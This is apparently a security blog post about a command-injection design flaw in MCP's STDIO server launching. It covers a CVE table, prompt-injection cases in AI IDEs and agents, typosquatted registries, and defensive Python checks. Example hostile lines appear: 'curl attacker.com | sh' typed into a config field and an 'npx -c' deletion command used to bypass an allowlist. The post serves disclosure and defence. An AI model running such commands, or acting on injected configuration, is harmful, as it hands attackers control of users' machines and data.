Evgen Verzun
Blog
April 22, 2026
The Mythos Paradox and a Critical Backdoor in Anthropic's MCP
We have all heard the pitch. Anthropic's new Mythos model can find a 27-year-old bug in OpenBSD and a 16-year-old flaw in FFmpeg that automated tools missed after five million test runs. It autonomously chained multiple Linux kernel exploits, emailed a researcher to announce its success, and even posted details of the hack to obscure public websites.
When Anthropic announced that Claude Code could automate COBOL modernization, a core part of IBM's mainframe business, IBM shares cratered 13.2 percent (!), wiping out roughly $30 billion in market capitalization in a single day. A five-minute blog post by Anthropic triggered the stock's largest single-day decline since the dot-com bubble burst. Investors are now increasingly wary that AI tools like Mythos could erode demand for traditional enterprise software and consulting services, and that fear is baked into the market.
Last week Anthropic unveiled Mythos to help secure the world's software. This week, however, a critical command injection vulnerability in its own Model Context Protocol (MCP) was made public, and the company seemingly refuses to fix it.
This is the paradox we need to talk about.
What's MCP and Why Should I Care?
MCP is Anthropic's open standard for AI agents to invoke external tools. Basically, it is the thing used to run commands, read files, talk to databases, anything a developer can dream up. It is built into every major AI-powered IDE, including Cursor, VS Code, Windsurf, Claude Code, and Gemini CLI. Over 150 million downloads, up to 200,000 servers, and more than 200 open source projects now depend on it.
STDIO Was Never Designed for This
The flaw is deceptively simple. MCP servers often communicate via STDIO, the same mechanism that runs python script.py in your terminal. When an MCP server is configured, it usually takes a command string like python or node and spawns it as a subprocess. The SDKs for Python, TypeScript, Java, and Rust do not validate or sanitise those commands in any meaningful way.
This means if an attacker can control or influence the command string, through prompt injection, a poisoned marketplace download, a malicious web page, or anything else really, the agent will just execute it. There is no need to escape a sandbox because there simply is no sandbox.
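To see why that is so dangerous, here is a minimal sketch in Python of what an unvalidated STDIO-style launcher amounts to. This is illustrative pseudocode in the spirit of the flaw, not the actual MCP SDK source: the configured command string goes straight to a subprocess, so whoever controls the config controls the machine.

```python
import subprocess

def spawn_mcp_server(config: dict) -> str:
    """Naive STDIO-style launcher: the configured command is spawned
    as a subprocess with no validation whatsoever (illustrative only,
    not the real SDK code)."""
    argv = [config["command"], *config.get("args", [])]
    # No allowlist, no sanitisation: the command is trusted as-is.
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout

# A legitimate config and an attacker-influenced one look identical
# to the launcher; both simply run.
benign = {"command": "echo", "args": ["starting server"]}
hostile = {"command": "echo", "args": ["curl attacker.com | sh would run just as happily"]}
print(spawn_mcp_server(benign))
print(spawn_mcp_server(hostile))
```

The point is that nothing in the launch path distinguishes "the command the developer intended" from "the command an attacker wrote into the config".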
I'll just quote OX Security's disclosure here: "This is not a traditional coding error. It is an architectural design decision baked into Anthropic's official MCP SDKs across every supported programming language."
Four Attack Vectors
OX Security identified four distinct families of exploitation, each more worrying than the last.
Direct command injection through configuration interfaces. Many AI frameworks let users add custom MCP servers via a web UI. An attacker can simply type curl attacker.com | sh into the command field and hit save. The next time the AI runs, the command executes. CVEs like CVE-2026-30623 (LiteLLM) and CVE-2025-65720 (GPT Researcher) are examples of this class.
Hardening bypasses in "protected" environments. Some platforms try to restrict commands, but an attacker can append command-line flags to whitelisted commands. For example, npx -c "rm -rf /" might slip through because npx is allowed, while the -c flag loads an arbitrary command string. Flowise and other platforms fell victim to this.
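The bypass works because a naive allowlist vets only the binary name and never its arguments. A hypothetical sketch of the broken check next to a stricter one:

```python
ALLOWED_BINARIES = {"npx", "node", "python"}  # example allowlist

def naive_is_allowed(command: str, args: list[str]) -> bool:
    # Broken: only the binary name is checked, so flags sail through.
    return command in ALLOWED_BINARIES

def stricter_is_allowed(command: str, args: list[str]) -> bool:
    # Also reject option-style arguments, which can smuggle in code
    # (e.g. a flag that evaluates its value as a script).
    return command in ALLOWED_BINARIES and not any(a.startswith("-") for a in args)

# "npx" is whitelisted, so the naive check happily approves a payload...
print(naive_is_allowed("npx", ["-c", "rm -rf /"]))     # True
# ...while the stricter check refuses it.
print(stricter_is_allowed("npx", ["-c", "rm -rf /"]))  # False
```

Even the stricter version is only a sketch; real hardening also has to consider environment variables, path tricks, and per-binary flag semantics.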
Zero click prompt injection in AI IDEs. This is the scariest one. In Windsurf (CVE-2026-30615), a malicious website can plant a prompt injection that rewrites the local MCP configuration. When the developer opens the site, the IDE automatically loads the poisoned config and executes arbitrary commands on the local machine without any additional approvals. Just a page view.
Windsurf was the only IDE where exploitation required zero user interaction, but others like Cursor and VS Code are not far behind.
Malicious marketplace distribution. Attackers can typosquat MCP registries: publish claud-code instead of claude-code, nmap-agent-py instead of nmap_agent_py. When a developer installs the wrong one, it just runs the malicious server. OX Security successfully poisoned 9 out of 11 MCP registries with a harmless test payload!
In February 2026, a campaign called SANDWORM_MODE distributed 19 typosquatted npm packages that installed rogue MCP servers. More recently, a fake Postmark MCP npm package stole emails with a one liner.
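Typosquats of this kind are cheap to catch before installation. A small sketch using Python's standard difflib, with the package-name pairs taken from the examples above:

```python
import difflib

# Names of legitimate packages (examples from the incidents above).
KNOWN_PACKAGES = ["claude-code", "nmap_agent_py"]

def typosquat_suspects(name: str, known=KNOWN_PACKAGES, cutoff=0.8) -> list[str]:
    """Return known packages that a given name is suspiciously close to.
    An exact match is fine; a near-miss deserves a second look."""
    if name in known:
        return []
    return difflib.get_close_matches(name, known, n=3, cutoff=cutoff)

print(typosquat_suspects("claud-code"))   # ['claude-code']
print(typosquat_suspects("claude-code"))  # []
```

The cutoff is a tunable placeholder; a production check would also normalise separators (hyphen vs underscore) and compare against the full registry, not a hand-picked list.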
Real World Impact
The OX Security team executed commands on six live production platforms and issued more than 10 Critical or High CVEs from this single root cause. Critical vulnerabilities were identified in industry staples like LiteLLM, LangChain, and IBM's LangFlow.
| CVE ID | Product | Attack Vector | Severity | Status |
| --- | --- | --- | --- | --- |
| CVE-2025-65720 | GPT Researcher | UI injection / reverse shell | Critical | Reported |
| CVE-2026-30623 | LiteLLM | Authenticated RCE via JSON config | Critical | Patched |
| CVE-2026-30624 | Agent Zero | Unauthenticated UI injection | Critical | Reported |
| CVE-2026-30618 | Fay Framework | Unauthenticated web-GUI RCE | Critical | Reported |
| CVE-2026-33224 | Bisheng | Authenticated UI injection (open registration) | Critical | Patched |
| CVE-2026-30617 | Langchain-Chatchat | Unauthenticated UI injection | Critical | Reported |
| CVE-2026-33224 | Jaaz | Unauthenticated UI injection | Critical | Reported |
| CVE-2026-30625 | Upsonic | Allowlist bypass via npx/npm args | High | Warning |
| CVE-2026-30615 | Windsurf | Zero-click prompt injection to local RCE | Critical | Reported |
| CVE-2026-26015 | DocsGPT | MITM transport-type substitution | Critical | Patched |
For context, once an attacker has RCE, the damage cascades from there. A malicious MCP server could exfiltrate a user's entire WhatsApp history by poisoning a tool the agent legitimately trusted.
Another proof of concept used a fake weather MCP server to discover and exploit a legitimate banking tool, stealing account balances. With a single overprivileged token wired into the MCP server, a compromised agent could exfiltrate private repository contents, internal project details, and even personal financial information into a public pull request.
The Mythos paradox
Now here is the baffling part.
As I write this, it has been about a week since Anthropic unveiled Claude Mythos, a model so good at finding vulnerabilities that they are withholding it from the public because it is "too dangerous". The system card details 27 year old OpenBSD bugs, 16 year old FFmpeg flaws, autonomous sandbox escapes, and the ability to chain exploits among many other things. Anthropic even went out of their way to start Project Glasswing, giving early access to a club of corporate partners to scan their own systems.
In other words, they are positioning Mythos as a defensive tool.
At the same time, they will not fix a basic STDIO command injection in their own SDK, the tool that literally every developer building on MCP has to use?
When OX Security reported the issue and recommended a protocol-level fix that would have instantly protected millions of downstream users, Anthropic declined. The company confirmed the behavior as "expected", citing that sanitisation is the developer's responsibility and that STDIO serves as a secure default for local use.
Let's be honest, if you are spawning python as a command, you should sanitise the arguments. But when the flaw exists in every official SDK across every language, and when the vulnerability ripples through a supply chain with 150 million downloads and 7,000 exposed servers, maybe it is time to admit that "developer responsibility" is just a convenient excuse.
The Dark Patterns and The Leaks
The cognitive dissonance doesn't end with MCP. Around the same time, privacy consultant Alexander Hanff discovered that Anthropic's Claude Desktop for macOS was installing files that affect other vendors' browsers without disclosure, even authorizing browser extensions for browsers not yet present on the user's device. He found that the desktop app pre-installed a Native Messaging manifest file that pre-authorizes Chrome extensions, effectively setting up a bridge for the AI to access browsers without explicit user consent.
It is a dark pattern that breaches European privacy law: the binary bridge application runs outside the browser's sandbox at user privilege level without surfacing a single permission prompt. In effect, it is a pre-authorized backdoor that, once exploited, could grant attackers full control over a user's browser.
And if that wasn't enough, just days earlier a source map file was accidentally included in the Claude Code npm package: a 60 MB file that exposed over 512,000 lines of proprietary TypeScript source code.
The leaked code revealed a trove of internal secrets, including an unreleased "KAIROS" system, a virtual pet "BUDDY", and the infamous "UndercoverMode" subsystem, which instructed the AI to hide its tracks when contributing to public repositories. This is the same company that tries to build a reputation as the "safety-conscious AI lab", yet has a track record of very questionable practices from both privacy and security standpoints.
What You Can Do About It
No matter how you look at it, until Anthropic changes its mind, you are on your own.
That's just the truth. I suggest the following:
Treat all external MCP configuration as untrusted. Never let user input reach downstream configurations for StdioServerParameters or similar functions. Block it completely, or restrict it to a preapproved allowlist of safe commands.
Only install MCP servers from verified sources. The official GitHub MCP Registry is your best bet. Avoid typosquatting by double checking package names.
Run MCP services inside a sandbox. Restrict permissions, block access to external databases, API keys, and configuration files. Never give a server full disk access or shell execution privileges unless absolutely necessary.
Monitor tool invocations. Keep an eye on what your AI agent is actually calling. Be wary of "background" activity or tools that attempt to exfiltrate data to unknown external URLs. If possible, implement IP and URL blocking.
Upgrade to the latest versions of affected services. If a service does not have a fixed version, do not expose it to user input, or disable it until patched.
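For the first recommendation, here is a hedged sketch of what "block it or allowlist it" can look like in practice: vet the command and its arguments before anything reaches StdioServerParameters (or your framework's equivalent). The specific allowlist and rejection rules below are placeholders you would tune to your own environment.

```python
APPROVED_COMMANDS = frozenset({"python", "node", "uvx"})  # example allowlist
SHELL_METACHARS = set(";|&$`><")

def vet_server_command(command: str, args: list[str]) -> tuple[str, list[str]]:
    """Raise ValueError unless the command is preapproved and its
    arguments contain no flags or shell metacharacters."""
    if command not in APPROVED_COMMANDS:
        raise ValueError(f"command {command!r} is not on the allowlist")
    for a in args:
        if a.startswith("-") or SHELL_METACHARS.intersection(a):
            raise ValueError(f"suspicious argument {a!r}")
    return command, list(args)

# A plain server launch passes...
print(vet_server_command("python", ["server.py"]))
# ...while injected payloads are rejected before they ever spawn.
for bad in (("curl", ["attacker.com"]), ("python", ["-c", "evil()"])):
    try:
        vet_server_command(*bad)
    except ValueError as err:
        print("blocked:", err)
```

Rejecting every dash-prefixed argument is deliberately blunt; loosen it per command only after checking what each flag can actually do.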
The Bottom Line
Models like Mythos might be the future of security. But the present still needs fixing, and I am not sure Anthropic is fit to lead that charge in good faith.
We have a company that builds its brand around security and responsible AI, yet cannot be bothered to patch a command injection vector in its own protocol because "it is by design". We have a flagship model gatekept from the public for being "too dangerous", yet built on infrastructure that is wide open and vulnerable. Not to mention practices revealed by leaks that were clearly never intended for the public eye.
Again, most of this does not come from traditional coding errors, but from deliberate architectural design and internal leadership decisions.
For now, or at least until Anthropic chooses differently, every AI agent that speaks MCP should be considered a potential backdoor into your machine.